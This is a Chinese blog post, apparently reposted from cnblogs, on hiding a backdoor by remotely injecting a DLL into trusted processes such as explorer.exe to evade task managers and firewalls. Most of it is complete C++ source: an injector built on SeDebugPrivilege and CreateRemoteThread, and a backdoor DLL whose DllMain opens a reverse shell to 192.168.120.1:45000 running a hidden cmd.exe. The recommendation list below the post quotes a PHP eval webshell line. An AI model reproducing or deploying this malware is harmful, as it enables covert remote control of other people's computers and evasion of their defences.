使用DLL进行远程线程注入,实现穿墙与隐藏进程

已于 2024-09-14 18:10:37 修改
阅读量79 收藏
点赞数
文章标签: windows 安全
于 2024-09-14 17:48:37 首次发布
原文链接:https://www.cnblogs.com/PeterZ1997/p/9532051.html
版权

简介

大多数后门或病毒要想初步实现隐藏进程,即不被像任务管理器这样典型的RING3级进程管理器找到过于明显的不明进程,其中比较著名的方法就是通过远程线程注入的方法注入将恶意进程的DLL文件注入系统认可的正常进程,你会发现任务管理器以及找不到独立出现的恶意进程项了。反向连接型后门采用这种技术,注入防火墙认可的进程(例如大部分系统进程,像explorer.exe就很常见)还能够获得一定的穿墙效果。

    进程注入虽然已经是将近10年前的技术了,但是今天出现的很多新型黑客技术大多数还是基于这类老技术演变而来的。

1.进程注入工具源码:

//
//
// FileName : injectDll.cpp
// Creator : PeterZ1997
// Date : 2018-5-15 23:58
// Comment : DLL inject module
//
//

#pragma once
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <windows.h>
#include <tlhelp32.h>

using namespace std;

#define MAX_COUNT 255

/**
 * @brief 提高进程权限
 * @param name   权限名
 */
BOOL EnableDebugPriv(LPCSTR name)
{
	HANDLE hToken;
	LUID luid;
	TOKEN_PRIVILEGES tp;
	// 打开进程令牌
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
	{
		printf("[!]Get Process Token Error!\n");
		return false;
	}
	// 获取权限Luid
	if (!LookupPrivilegeValue(NULL, name, &luid))
	{
		printf("[!]Get Privilege Error!\n");
		return false;
	}
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	// 修改进程权限
	if (!AdjustTokenPrivileges(hToken, false, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
	{
		printf("[!]Adjust Privilege Error!\n");
		return false;
	}
	return true;
}

bool EnableDebugPrivilege()
{
    TOKEN_PRIVILEGES tp = { 0 };
    void* htoken = NULL;
    bool bret = false;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;// or 'FALSE' to disable.

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &htoken)) {
        LOGE("Opentoken fail,%d", GetLastError());
        return false;
    }


    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &(tp.Privileges[0].Luid))) {
        if (AdjustTokenPrivileges(htoken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
            bret = true;
        }
        else {
            LOGE("Privileges2 fail,%d", GetLastError());
        }

    }
    else {
        LOGE("Lookup2 fail,%d", GetLastError());
    }


    CloseHandle(htoken);
    return bret;
}


/**
 * @brief 进程注入函数
 * @param pid            进程id
 * @param dllFileName    DLL文件的完整路径
 */
BOOL InjectDllProc(DWORD pid, LPCTSTR dllFileName)
{
	HANDLE hRemoteProcess;
	CHAR *pszDllSpace;
	if (!EnableDebugPriv(SE_DEBUG_NAME))
	{
		return false;
	}
	if ((hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == NULL)
	{
		printf("[!]Open Target Process Error!\n");
		return false;
	}
	if ((pszDllSpace = (CHAR*)VirtualAllocEx(hRemoteProcess, NULL, strlen(dllFileName) + 1, MEM_COMMIT, PAGE_READWRITE)) == NULL)
	{
		printf("[!]Alloc Space Error!\n");
		return false;
	}
	if (WriteProcessMemory(hRemoteProcess, pszDllSpace, (LPVOID)dllFileName, strlen(dllFileName) + 1, NULL) == 0)
	{
		printf("[!]Write to the Memory Error!\n");
		return false;
	}
	PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
	if (pfnStartAddr == NULL)
	{
		printf("[!]Get <LoadLibrary> Function Error!\n");
		return false;
	}
	HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszDllSpace, 0, NULL);
	if (hRemoteThread == NULL)
	{
		printf("[!]Create Remote Thread Error!\n");
		return false;
	}
	return true;
}

/**
 * @brief 获取进程id
 * @param procName  进程名
 */
DWORD GetProcPid(LPCSTR procName)
{
	DWORD pid = 0;
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(pe32);
	HANDLE hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcSnap == INVALID_HANDLE_VALUE)
	{
		printf("[!]Can not Create Process Snap !\n");
		return -1;
	}
	BOOL bProc = Process32First(hProcSnap, &pe32);
	while (bProc)
	{
		if (!stricmp(procName, pe32.szExeFile))
		{
			return pe32.th32ProcessID;
		}
		bProc = Process32Next(hProcSnap, &pe32);
	}
	CloseHandle(hProcSnap);
	return pid;
}

/**
 * @brief 主函数
 */
int main(int argc, char* argv[])
{
	CHAR dllPath[MAX_COUNT] = "\0";
	WIN32_FIND_DATA wfd;
	if (argc != 3)
	{
		printf("[*Usage*] injectDll.exe <Process Name> <Dll Name>\n");
		return 0;
	}
	GetCurrentDirectory(sizeof(dllPath), dllPath);
	StringCchCat(dllPath, sizeof(dllPath), "\\");
	StringCchCat(dllPath, sizeof(dllPath), argv[2]);
	if (FindFirstFile(argv[2], &wfd) == INVALID_HANDLE_VALUE)
	{
		printf("[!] Can not Find Dll File !\n");
		return 0;
	}
	DWORD pid = GetProcPid(argv[1]);
	if (pid != -1)
	{
		if (!InjectDllProc(pid, dllPath))
		{
			printf("[!]Inject Dll Error!\n");
			return 0;
		}
		printf("[*]Inject Dll Success!\n");
	}
	else
	{
		printf("[*]Inject Dll Error!\n");
		return 0;
	}
	return 0;
}

2.Dll文件样例源码:

/
//
// FileName : BackDoorDLL.cpp
// Creator : PeterZ1997
// Date : 2018-5-11 00:10
// Comment : 零管道后门DLL
//


#pragma once
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <WinSock2.h>
#include <windows.h>

#pragma comment(lib, "ws2_32")

using namespace std;

#define MAX_COUNT 255

/**
 * @brief 启动Cmd进程,与socket实例通信
 * @param lpParameter    多线程函数参数,此为传入socket实例
 */
DWORD WINAPI StartShellProc(LPVOID lpParameter)
{
	CHAR cmdLine[MAX_COUNT] = "\0";
	SOCKET sServer = (SOCKET)lpParameter;
	STARTUPINFO si;
	GetStartupInfo(&si);
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sServer;
	GetSystemDirectory(cmdLine, sizeof(cmdLine));
	StringCchCat(cmdLine, sizeof(cmdLine), "\\cmd.exe");
	PROCESS_INFORMATION pi;
	CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &si, &pi);
	WaitForSingleObject(pi.hProcess, INFINITE);
	CloseHandle(pi.hProcess);
	return 0;
}

/**
 * @brief socket建立函数
 * @param lpParameter    多线程函数参数,这里传入NULL
 */
DWORD WINAPI BackDoorThread(LPVOID lpParameter)
{
	CHAR szMessage[MAX_COUNT] = "===========> Hello,Admin <=============\n";
	WSADATA wsd;
	SOCKET sServer;
	sockaddr_in sin;
	if (WSAStartup(0x0202, &wsd)) return 0;
	if ((sServer = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) == INVALID_SOCKET)
	{
		return 0;
	}
	sin.sin_family = AF_INET;
	sin.sin_port = htons(45000);
	sin.sin_addr.S_un.S_addr = inet_addr("192.168.120.1");
	if (connect(sServer, (sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
	{
		return 0;
	}
	if (send(sServer, szMessage, strlen(szMessage), 0) == SOCKET_ERROR)
	{
		return 0;
	}
	HANDLE hThread = CreateThread(NULL, 0, StartShellProc, (LPVOID)sServer, 0, NULL);
	WaitForSingleObject(hThread, INFINITE);
	return 0;
}

/**
 * @brief DLL文件主函数
 */
BOOL WINAPI DllMain(
	_In_ HINSTANCE hinstDLL,
	_In_ DWORD     fdwReason,
	_In_ LPVOID    lpvReserved
)
{
	switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		CreateThread(NULL, 0, BackDoorThread, NULL, 0, NULL);
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	case DLL_PROCESS_DETACH:
		break;
	}
	return true;
}

转载:https://www.cnblogs.com/PeterZ1997/p/9532051.html

远方的白桦树
关注
使用远程线程注入DLL
08-04
远程线程注入是一种技术,主要用于在另一个进程的上下文中执行代码。这种技术在软件开发、调试、自动化测试以及恶意软件中都有应用。本篇将详细解释远程线程注入的概念、工作原理,以及如何通过代码实现远程线程...
远程线程注入实现木马进程隐藏
05-05
在提供的文件"NT环境下进程隐藏实现 - VC知识库文章.mht"中,可能详细介绍了如何在Windows NT环境下利用VC++进行远程线程注入的实践过程,包括代码示例和可能的注意事项。而"hidesrc"可能是包含实际注入代码的...
安全之路 —— 借助DLL进行远程线程注入实现穿墙隐藏进程
墨鱼菜鸡
05-16 51
简介 大多数后门或病毒要想初步实现隐藏进程,即不被像任务管理器这样典型的RING3级进程管理器找到过于明显的不...
Delphi编写无DLL穿墙的下载者
编程资料收集与共享交流
11-26 744
其实也就是用烂了的远程注入法。不过注入的对象不是一个DLL,而是本身的一个过程。 program InjectTheSelf;{$IMAGEBASE $13140000}uses Windows, Urlmon;procedure Download; //下载过程beginURLDownloadToFile(nil, 下载的URL, 本地文件路径, 0, nil
DLL版Downloader的代码
04-22 1406
这份代码的思路来自于国外EES组织的Aphex。基本上所有的无DLL Download都是利用的这种方法。其实也就是用烂了的远程注入法。不过注入的对象不是一个DLL,而是本身的一个过程。下面是代码,由于本人专业知识不够,可能有些说法不太专业。请大家凑合着看。有不懂的请跟贴。program InjectTheSelf;{$IMAGEBASE $13140000}uses Windows, Urlmo
打造无DLL版穿透防火墙Downloader
weixin_33860737的博客
07-13 50
这份代码的思路来自于国外EES组织的Aphex。基本上所有的无DLL Download都是利用的这种方法。其实也就是用烂了的远程注入法。不过注入的对象不是一个DLL,而是本身的一个过程。下面是代码,由于本人专业知识不够,可能有些说法不太专业。请大家凑合着看。有不懂的请跟贴。 program InjectTheSelf; {$IMAGEBASE $13140000} uses Window...
***病毒的隐藏方式
weixin_33889665的博客
04-23 545
***病毒的隐藏方式 ***病毒的危害在于它对计算机系统具有强大的控制和破坏能力。功能强大的***一旦被植入用户的计算机,***的制造者就可以像操作自己的计算机一样控制服务端计算机,甚至可以远程监控用户的所有操作。在每年爆发的众多网络安全事件中,大部分网络***都是通过***病毒进行的。著名的微软公司也曾经遭到过蠕虫***的***,导致部分产品源码的泄露,造成...
C++/Windows逆向面试题
qq_43075448的博客
04-23 713
线程是指计算机并发执行程序时的最小单位。一个进程可以拥有多个线程,而进程则是一个运行中的应用程序实例。线程可以共享进程中的数据和资源,是一种轻量级的并发方式。与进程相比,线程的创建、撤销和切换都比较快速,同时也占用较少的系统资源。进程线程的主要区别在于:前者拥有独立的地址空间和系统资源,而后者共享这些资源。在一个进程中创建多个线程可以使得各个线程之间可以相互协作,以实现更高效的并发任务处理。线程安全是指,在多线程程序中,保证共享数据在各个线程中访问和修改的正确性。
c/c++成长之捷径
明月松间照,清泉石上流!
10-15 7055
c++成长之路不再迷茫!           不知不觉中进入计算机行业已有多个年头了,回首往事依然历历在目。今天我把我这段时间收集的书籍资料以及实例源码帖出来(部分资料太大了放不上去,理解下),与大家一起分享,我想其中的一些资料对大家会有帮助,并且我希望这些资料以及实例源码能对大家有一定的提升作用。帮助初学者快速进入VC++并且能融会贯通,那么我的目的也就达到了。 首先推荐的视频教
c/c++成长之捷径 C/C++学习资料大全
Windeal
05-31 9848
socket协议 三次握手与结束连接 客户端代码: #include #include #include //for bzero #include //for socketaddr_in #include #include #include #define PORT 5050 //端口号 #define MAXLEN_FOR_DATA
渗透测试工程师面试题大全(二)
热门推荐
w1304099880的博客
04-22 1万+
渗透测试工程师面试题大全(二) from:backlion大佬 整理 51.sql 注入写文件都有哪些函数? (1)select ‘一句话’ into outfile ‘路径’ (2)select ‘一句话’ into dumpfile ‘路径’ (3) select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu....
远程线程注入_远程_远程线程_dll注入_注入_
10-01
5. **清理与通信**:一旦线程启动,注入者可能需要与被注入进程进行通信,或者在完成任务后清理资源。这可能涉及到更多的API调用,如`WaitForSingleObject`来同步操作,或`CloseHandle`来关闭打开的句柄。 在提供...
InjectDLL代码 实现远程注入线程.zip
03-28
在实际应用中,远程线程注入可能用于调试目的,例如动态附加到运行中的进程进行调试,或者在安全监控中检测可疑行为。然而,它也可能被黑客利用,进行诸如键盘记录、数据窃取等恶意活动。因此,对于开发和使用此类...
DLL远程线程注入源码
01-20
远程线程注入则是通过在目标进程中创建一个新的线程,并将DLL加载到该进程中执行,以此来实现对目标进程的控制或扩展其功能。这种技术常用于跨进程通信、功能增强、甚至黑客攻击。 远程线程注入的步骤主要包括以下...
excel导出图片---HSSFWorkbook--SXSSFWorkbook
最新发布
ChickenBro_的博客
09-25 619
平时在工作中,excel导出图片经常会用到,但奈何HSSFWorkbook导出数据数量有限制问题,所以企业里大多都用SXSSFWorkbook格式,很少用HSSFWorkbook。所以今天以这两种格式分别记录下,图片的导出过程。
第三十二章 使用派生密钥令牌进行加密和签名 - 使用 DerivedKeyToken 进行加密
yaoxin521123的博客
09-25 286
类方法,并指定加密数据实例作为参数。b. 要加密的项目。省略此参数可加密正文。在此场景中,当前唯一支持的值是。方法并指定数据引用实例作为参数。请注意,此步骤还会创建并添加。b. 调用引用列表实例的。
java:通过sigar获取系统信息,不用who5
hongyuxiongji的博客
09-19 416
System.out.println("进程名称: " + processInfo.processName + ", PID: " + processInfo.pid + ", CPU 使用率: " + processInfo.cpuUsage + "%, 内存使用率: " + processInfo.memoryUsagePercent + "%");你可以在 Spring Boot 的服务类或控制器中调用这个工具类来获取进程信息并进行处理。// 处理获取单个进程信息时的异常。
3.数据类型
yxg2012_04_06的博客
09-19 823
python数据类型及操作
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值